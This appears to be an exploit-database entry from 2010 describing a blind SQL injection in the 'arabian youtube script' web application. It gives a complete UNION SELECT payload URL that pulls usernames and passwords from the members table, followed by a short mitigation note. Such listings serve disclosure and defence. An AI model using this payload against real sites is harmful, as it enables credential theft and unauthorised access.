vendor:
arabian youtube script
by:
R3d-D3v!L
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: arabian youtube script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
blind SQL Injection Vulnerabilities
An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter in the URL. For example, http://127.0.0.1/clip/index.php?v=11+and+1=0+union+select+1,concat%28uname,passwd%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members--
Mitigation:
Input validation should be used to detect and reject malicious input. Parameterized queries should be used to prevent SQL injection attacks.